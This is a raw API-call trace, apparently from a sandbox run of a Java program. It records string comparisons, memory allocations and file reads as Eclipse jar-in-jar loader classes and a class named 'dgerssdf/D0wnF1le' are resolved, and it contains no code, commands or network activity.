0x1 [0018.374] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.374] strlen (_Str="java/lang/ClassLoader") returned 0x15 [0018.374] strcpy (in: _Dest=0xb5f0a0, _Source="java/lang/ClassLoader" | out: _Dest="java/lang/ClassLoader") returned="java/lang/ClassLoader" [0018.374] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.374] strlen (_Str="@A") returned 0x2 [0018.374] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.375] strlen (_Str="A") returned 0x1 [0018.375] strlen (_Str="java/net/URLStreamHandler") returned 0x19 [0018.376] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0x3c [0018.377] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6c62, lpNewFilePointer=0x0, dwMoveMethod=0x4bde88 | out: lpNewFilePointer=0x0) returned 1 [0018.377] ReadFile (in: hFile=0x1c4, lpBuffer=0xacb010, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bde58, lpOverlapped=0x0 | out: lpBuffer=0xacb010*, lpNumberOfBytesRead=0x4bde58*=0xa0, lpOverlapped=0x0) returned 1 [0018.379] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x1307, lpNewFilePointer=0x0, dwMoveMethod=0x4bc14c | out: lpNewFilePointer=0x0) returned 1 [0018.379] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bc184, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bc11c, lpOverlapped=0x0 | out: lpBuffer=0x4bc184*, lpNumberOfBytesRead=0x4bc11c*=0x1e, lpOverlapped=0x0) returned 1 [0018.379] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x1367, lpNewFilePointer=0x0, dwMoveMethod=0x4bc188 | out: lpNewFilePointer=0x0) returned 1 [0018.379] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bc204, nNumberOfBytesToRead=0x36f, lpNumberOfBytesRead=0x4bc158, lpOverlapped=0x0 | out: lpBuffer=0x4bc204*, lpNumberOfBytesRead=0x4bc158*=0x36f, lpOverlapped=0x0) returned 1 [0018.382] strlen (_Str="") returned 0x0 [0018.382] strlen (_Str="A") returned 0x1 [0018.382] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.382] strcmp (_Str1="java/net/URLStreamHandlerFactory", _Str2="java/net/URLStreamHandlerFactory") returned 0 [0018.382] strlen (_Str="A") returned 0x1 [0018.382] strlen (_Str="") returned 0x0 [0018.382] strlen (_Str="A") returned 0x1 [0018.382] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.383] strcmp (_Str1="java/net/URLStreamHandlerFactory", _Str2="java/net/URLStreamHandlerFactory") returned 0 [0018.383] strlen (_Str="") returned 0x0 [0018.383] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.383] strlen (_Str="AA") returned 0x2 [0018.383] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.383] strcmp (_Str1="java/net/URLStreamHandler", _Str2="java/net/URLStreamHandler") returned 0 [0018.383] strlen (_Str="A") returned 0x1 [0018.383] strlen (_Str="") returned 0x0 [0018.383] strlen (_Str="A") returned 0x1 [0018.384] strcmp (_Str1="", _Str2="") returned 0 [0018.384] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.384] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.384] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.384] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.384] strlen (_Str="") returned 0x0 [0018.384] strlen (_Str="@") returned 0x1 [0018.385] strlen (_Str="") returned 0x0 [0018.385] strlen (_Str="") returned 0x0 [0018.385] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.385] strlen (_Str="AA") returned 0x2 [0018.385] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.385] strlen (_Str="") returned 0x0 [0018.387] strlen (_Str="java/lang/StringBuffer") returned 0x16 [0018.387] calloc (_Count=0x100, _Size=0x4) returned 0x1501a108 [0018.387] calloc (_Count=0x1f7, _Size=0x2) returned 0xb9f9f0 [0018.388] calloc (_Count=0x100, _Size=0x14) returned 0xb9d2b0 [0018.388] strlen (_Str="java/lang/Object") returned 0x10 [0018.388] strcpy (in: _Dest=0xb5f0a0, _Source="java/lang/Object" | out: _Dest="java/lang/Object") returned="java/lang/Object" [0018.388] strlen (_Str="java/lang/String") returned 0x10 [0018.388] strcpy (in: _Dest=0xb5f080, _Source="java/lang/String" | out: _Dest="java/lang/String") returned="java/lang/String" [0018.388] strlen (_Str="java/lang/Throwable") returned 0x13 [0018.388] strcpy (in: _Dest=0xb5f060, _Source="java/lang/Throwable" | out: _Dest="java/lang/Throwable") returned="java/lang/Throwable" [0018.388] strlen (_Str="java/lang/Cloneable") returned 0x13 [0018.388] strcpy (in: _Dest=0xb5f040, _Source="java/lang/Cloneable" | out: _Dest="java/lang/Cloneable") returned="java/lang/Cloneable" [0018.388] strlen (_Str="java/io/Serializable") returned 0x14 [0018.388] strcpy (in: _Dest=0xb5f020, _Source="java/io/Serializable" | out: _Dest="java/io/Serializable") returned="java/io/Serializable" [0018.388] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0x3c [0018.388] strcpy (in: _Dest=0x15010d08, _Source="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler" [0018.388] strlen (_Str="java/net/URLStreamHandler") returned 0x19 [0018.388] strcpy (in: _Dest=0xace638, _Source="java/net/URLStreamHandler" | out: _Dest="java/net/URLStreamHandler") returned="java/net/URLStreamHandler" [0018.389] strcmp (_Str1="java/net/URLStreamHandler", _Str2="java/net/URLStreamHandler") returned 0 [0018.389] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.389] strcmp (_Str1="startsWith", _Str2="") returned 1 [0018.389] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.390] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.390] strcmp (_Str1="substring", _Str2="") returned 1 [0018.390] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.390] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.390] strcmp (_Str1="getFile", _Str2="") returned 1 [0018.390] strlen (_Str="java/net/URL") returned 0xc [0018.390] strcpy (in: _Dest=0xb68170, _Source="java/net/URL" | out: _Dest="java/net/URL") returned="java/net/URL" [0018.390] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.390] strcmp (_Str1="equals", _Str2="") returned 1 [0018.390] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.390] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.391] strcmp (_Str1="getFile", _Str2="") returned 1 [0018.391] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.391] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.391] strcmp (_Str1="endsWith", _Str2="") returned 1 [0018.391] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.391] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.391] strlen (_Str="java/lang/StringBuffer") returned 0x16 [0018.391] strcpy (in: _Dest=0xb5f0e0, _Source="java/lang/StringBuffer" | out: _Dest="java/lang/StringBuffer") returned="java/lang/StringBuffer" [0018.391] strcmp (_Str1="getFile", _Str2="") returned 1 [0018.391] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.391] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.391] strcmp (_Str1="valueOf", _Str2="") returned 1 [0018.391] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.392] strcmp (_Str1="", _Str2="") returned 0 [0018.392] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.392] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.392] strcmp (_Str1="append", _Str2="") returned 1 [0018.392] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.392] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.392] strcmp (_Str1="toString", _Str2="") returned 1 [0018.392] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.392] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.392] strcmp (_Str1="setURL", _Str2="") returned 1 [0018.393] strcmp (_Str1="java/net/URLStreamHandler", _Str2="java/net/URLStreamHandler") returned 0 [0018.393] strcmp (_Str1="java/net/URLStreamHandler", _Str2="java/net/URLStreamHandler") returned 0 [0018.393] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.393] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.393] strlen (_Str="") returned 0x0 [0018.393] strlen (_Str="") returned 0x0 [0018.393] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.393] strlen (_Str="AA") returned 0x2 [0018.394] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.394] strlen (_Str="I") returned 0x1 [0018.394] strlen (_Str="") returned 0x0 [0018.394] strlen (_Str="") returned 0x0 [0018.394] strlen (_Str="AI") returned 0x2 [0018.394] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.394] strlen (_Str="A") returned 0x1 [0018.394] strlen (_Str="") returned 0x0 [0018.394] strlen (_Str="") returned 0x0 [0018.394] strlen (_Str="A") returned 0x1 [0018.395] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.395] strlen (_Str="") returned 0x0 [0018.395] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.395] strlen (_Str="AA") returned 0x2 [0018.395] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.395] strlen (_Str="I") returned 0x1 [0018.395] strlen (_Str="") returned 0x0 [0018.395] strlen (_Str="A") returned 0x1 [0018.395] strlen (_Str="") returned 0x0 [0018.395] strlen (_Str="") returned 0x0 [0018.395] strlen (_Str="A") returned 0x1 [0018.396] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.396] strlen (_Str="") returned 0x0 [0018.396] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.396] strlen (_Str="AA") returned 0x2 [0018.396] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.396] strlen (_Str="I") returned 0x1 [0018.396] strlen (_Str="") returned 0x0 [0018.396] strlen (_Str="1") returned 0x1 [0018.396] strlen (_Str="") returned 0x0 [0018.396] strlen (_Str="A") returned 0x1 [0018.396] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.397] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.397] strlen (_Str="A") returned 0x1 [0018.397] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.397] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.397] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.397] strlen (_Str="@A") returned 0x2 [0018.397] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.397] strlen (_Str="") returned 0x0 [0018.398] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.398] strlen (_Str="AA") returned 0x2 [0018.398] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.398] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.398] strlen (_Str="A") returned 0x1 [0018.398] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.398] strlen (_Str="A") returned 0x1 [0018.398] strlen (_Str="") returned 0x0 [0018.398] strlen (_Str="") returned 0x0 [0018.398] strlen (_Str="A") returned 0x1 [0018.398] strlen (_Str="") returned 0x0 [0018.398] strlen (_Str="") returned 0x0 [0018.398] strlen (_Str="") returned 0x0 [0018.399] strlen (_Str="") returned 0x0 [0018.399] strlen (_Str="") returned 0x0 [0018.399] strlen (_Str="") returned 0x0 [0018.399] strlen (_Str="") returned 0x0 [0018.399] strlen (_Str="") returned 0x0 [0018.399] strlen (_Str="") returned 0x0 [0018.399] strlen (_Str="") returned 0x0 [0018.399] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.399] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.399] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.399] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.399] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.399] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.399] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strlen (_Str="AAAAIAAAAA") returned 0xa [0018.400] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.400] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.401] strlen (_Str="") returned 0x0 [0018.401] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0x39 [0018.401] strcpy (in: _Dest=0x15010c30, _Source="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection" [0018.401] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0 [0018.401] strcmp (_Str1="", _Str2="") returned 0 [0018.401] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0 [0018.401] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0 [0018.401] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.401] strlen (_Str="java/net/URLConnection") returned 0x16 [0018.402] strcpy (in: _Dest=0xb5f000, _Source="java/net/URLConnection" | out: _Dest="java/net/URLConnection") returned="java/net/URLConnection" [0018.402] strlen (_Str="") returned 0x0 [0018.402] strlen (_Str="1") returned 0x1 [0018.402] strlen (_Str="") returned 0x0 [0018.402] strlen (_Str="") returned 0x0 [0018.402] strlen (_Str="A") returned 0x1 [0018.402] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0 [0018.402] strlen (_Str="java/lang/ClassLoader") returned 0x15 [0018.402] strcpy (in: _Dest=0xb5efe0, _Source="java/lang/ClassLoader" | out: _Dest="java/lang/ClassLoader") returned="java/lang/ClassLoader" [0018.402] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.402] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.402] strlen (_Str="@AA") returned 0x3 [0018.402] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.403] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.403] strlen (_Str="A") returned 0x1 [0018.403] strlen (_Str="java/net/URLConnection") returned 0x16 [0018.404] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0x39 [0018.405] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6bf5, lpNewFilePointer=0x0, dwMoveMethod=0x4bdd38 | out: lpNewFilePointer=0x0) returned 1 [0018.405] ReadFile (in: hFile=0x1c4, lpBuffer=0xacb010, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bdd08, lpOverlapped=0x0 | out: lpBuffer=0xacb010*, lpNumberOfBytesRead=0x4bdd08*=0xa0, lpOverlapped=0x0) returned 1 [0018.407] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfa7, lpNewFilePointer=0x0, dwMoveMethod=0x4bbffc | out: lpNewFilePointer=0x0) returned 1 [0018.407] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bc034, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bbfcc, lpOverlapped=0x0 | out: lpBuffer=0x4bc034*, lpNumberOfBytesRead=0x4bbfcc*=0x1e, lpOverlapped=0x0) returned 1 [0018.407] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x1004, lpNewFilePointer=0x0, dwMoveMethod=0x4bc038 | out: lpNewFilePointer=0x0) returned 1 [0018.407] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bc0b4, nNumberOfBytesToRead=0x2f3, lpNumberOfBytesRead=0x4bc008, lpOverlapped=0x0 | out: lpBuffer=0x4bc0b4*, lpNumberOfBytesRead=0x4bc008*=0x2f3, lpOverlapped=0x0) returned 1 [0018.409] strcmp (_Str1="", _Str2="") returned 0 [0018.409] strcmp (_Str1="java/net/URLStreamHandler", _Str2="java/net/URLStreamHandler") returned 0 [0018.410] strcmp (_Str1="java/net/URLStreamHandler", _Str2="java/net/URLStreamHandler") returned 0 [0018.410] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0 [0018.410] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.410] strlen (_Str="") returned 0x0 [0018.410] strlen (_Str="@") returned 0x1 [0018.410] strlen (_Str="") returned 0x0 [0018.410] strlen (_Str="") returned 0x0 [0018.411] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.411] strlen (_Str="AA") returned 0x2 [0018.411] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler") returned 0 [0018.411] strlen (_Str="") returned 0x0 [0018.413] strlen (_Str="java/lang/Class") returned 0xf [0018.413] strlen (_Str="dgerssdf/D0wnF1le") returned 0x11 [0018.414] strlen (_Str="dgerssdf/D0wnF1le") returned 0x11 [0018.415] calloc (_Count=0x100, _Size=0x4) returned 0x1501a108 [0018.415] calloc (_Count=0x1f7, _Size=0x2) returned 0xb9f9f0 [0018.415] calloc (_Count=0x100, _Size=0x14) returned 0xb9d2b0 [0018.415] strlen (_Str="java/lang/Object") returned 0x10 [0018.415] strcpy (in: _Dest=0xb5efe0, _Source="java/lang/Object" | out: _Dest="java/lang/Object") returned="java/lang/Object" [0018.415] strlen (_Str="java/lang/String") returned 0x10 [0018.415] strcpy (in: _Dest=0xb5f000, _Source="java/lang/String" | out: _Dest="java/lang/String") returned="java/lang/String" [0018.415] strlen (_Str="java/lang/Throwable") returned 0x13 [0018.415] strcpy (in: _Dest=0xb5f0e0, _Source="java/lang/Throwable" | out: _Dest="java/lang/Throwable") returned="java/lang/Throwable" [0018.415] strlen (_Str="java/lang/Cloneable") returned 0x13 [0018.416] strcpy (in: _Dest=0xb5f020, _Source="java/lang/Cloneable" | out: _Dest="java/lang/Cloneable") returned="java/lang/Cloneable" [0018.416] strlen (_Str="java/io/Serializable") returned 0x14 [0018.416] strcpy (in: _Dest=0xb5f040, _Source="java/io/Serializable" | out: _Dest="java/io/Serializable") returned="java/io/Serializable" [0018.416] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0x39 [0018.416] strcpy (in: _Dest=0x15010c30, _Source="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection" [0018.416] strlen (_Str="java/net/URLConnection") returned 0x16 [0018.416] strcpy (in: _Dest=0xb5f060, _Source="java/net/URLConnection" | out: _Dest="java/net/URLConnection") returned="java/net/URLConnection" [0018.416] strcmp (_Str1="java/net/URLConnection", _Str2="java/net/URLConnection") returned 0 [0018.416] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.417] strcmp (_Str1="java/net/URLConnection", _Str2="java/net/URLConnection") returned 0 [0018.417] strcmp (_Str1="getFile", _Str2="") returned 1 [0018.418] strlen (_Str="java/net/URL") returned 0xc [0018.418] strcpy (in: _Dest=0xb68158, _Source="java/net/URL" | out: _Dest="java/net/URL") returned="java/net/URL" [0018.418] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.418] strcmp (_Str1="decode", _Str2="") returned 1 [0018.418] strlen (_Str="java/net/URLDecoder") returned 0x13 [0018.418] strcpy (in: _Dest=0xb5f080, _Source="java/net/URLDecoder" | out: _Dest="java/net/URLDecoder") returned="java/net/URLDecoder" [0018.418] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0 [0018.418] strcmp (_Str1="getResourceAsStream", _Str2="") returned 1 [0018.418] strlen (_Str="java/lang/ClassLoader") returned 0x15 [0018.418] strcpy (in: _Dest=0xb5f0a0, _Source="java/lang/ClassLoader" | out: _Dest="java/lang/ClassLoader") returned="java/lang/ClassLoader" [0018.418] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.418] strlen (_Str="java/net/MalformedURLException") returned 0x1e [0018.419] strcpy (in: _Dest=0xace688, _Source="java/net/MalformedURLException" | out: _Dest="java/net/MalformedURLException") returned="java/net/MalformedURLException" [0018.419] strlen (_Str="java/lang/StringBuffer") returned 0x16 [0018.419] strcpy (in: _Dest=0xb5efc0, _Source="java/lang/StringBuffer" | out: _Dest="java/lang/StringBuffer") returned="java/lang/StringBuffer" [0018.419] strcmp (_Str1="", _Str2="") returned 0 [0018.419] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.419] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.419] strcmp (_Str1="java/net/URLConnection", _Str2="java/net/URLConnection") returned 0 [0018.419] strcmp (_Str1="append", _Str2="") returned 1 [0018.419] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.419] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.419] strcmp (_Str1="append", _Str2="") returned 1 [0018.420] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.420] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.420] strcmp (_Str1="toString", _Str2="") returned 1 [0018.420] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.420] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.420] strcmp (_Str1="", _Str2="") returned 0 [0018.420] strcmp (_Str1="java/net/MalformedURLException", _Str2="java/net/MalformedURLException") returned 0 [0018.420] strcmp (_Str1="java/net/MalformedURLException", _Str2="java/net/MalformedURLException") returned 0 [0018.420] strlen (_Str="java/io/InputStream") returned 0x13 [0018.420] strcpy (in: _Dest=0xb5efa0, _Source="java/io/InputStream" | out: _Dest="java/io/InputStream") returned="java/io/InputStream" [0018.420] strlen (_Str="") returned 0x0 [0018.421] strlen (_Str="A") returned 0x1 [0018.421] strcmp (_Str1="java/net/URLConnection", _Str2="java/net/URLConnection") returned 0 [0018.421] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.421] strlen (_Str="A") returned 0x1 [0018.421] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.421] strlen (_Str="") returned 0x0 [0018.421] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.421] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.421] strlen (_Str="AA") returned 0x2 [0018.422] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.422] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.422] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.422] strlen (_Str="A") returned 0x1 [0018.422] strlen (_Str="") returned 0x0 [0018.422] strlen (_Str="A") returned 0x1 [0018.422] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0 [0018.422] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.422] strlen (_Str="") returned 0x0 [0018.422] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.422] strlen (_Str="AA") returned 0x2 [0018.423] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.423] strcmp (_Str1="java/io/InputStream", _Str2="java/io/InputStream") returned 0 [0018.423] strlen (_Str="A") returned 0x1 [0018.423] strlen (_Str="") returned 0x0 [0018.423] strlen (_Str="A") returned 0x1 [0018.423] strlen (_Str="") returned 0x0 [0018.423] strlen (_Str="1") returned 0x1 [0018.423] strlen (_Str="") returned 0x0 [0018.423] strlen (_Str="1") returned 0x1 [0018.423] strlen (_Str="") returned 0x0 [0018.423] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.423] strlen (_Str="@A") returned 0x2 [0018.423] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.424] strlen (_Str="") returned 0x0 [0018.424] strlen (_Str="A") returned 0x1 [0018.424] strcmp (_Str1="java/net/URLConnection", _Str2="java/net/URLConnection") returned 0 [0018.424] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.424] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.424] strlen (_Str="AA") returned 0x2 [0018.424] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.424] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.425] strlen (_Str="") returned 0x0 [0018.425] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.425] strlen (_Str="AA") returned 0x2 [0018.425] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.425] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.425] strlen (_Str="A") returned 0x1 [0018.425] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.425] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.425] strlen (_Str="@A") returned 0x2 [0018.426] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.426] strlen (_Str="O") returned 0x1 [0018.426] strlen (_Str="java/net/MalformedURLException") returned 0x1e [0018.433] strlen (_Str="") returned 0x0 [0018.433] strlen (_Str="A") returned 0x1 [0018.433] strlen (_Str="") returned 0x0 [0018.433] strcmp (_Str1="", _Str2="") returned 0 [0018.433] strcmp (_Str1="java/net/URLConnection", _Str2="java/net/URLConnection") returned 0 [0018.433] strcmp (_Str1="java/net/URLConnection", _Str2="java/net/URLConnection") returned 0 [0018.434] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0 [0018.434] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.434] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 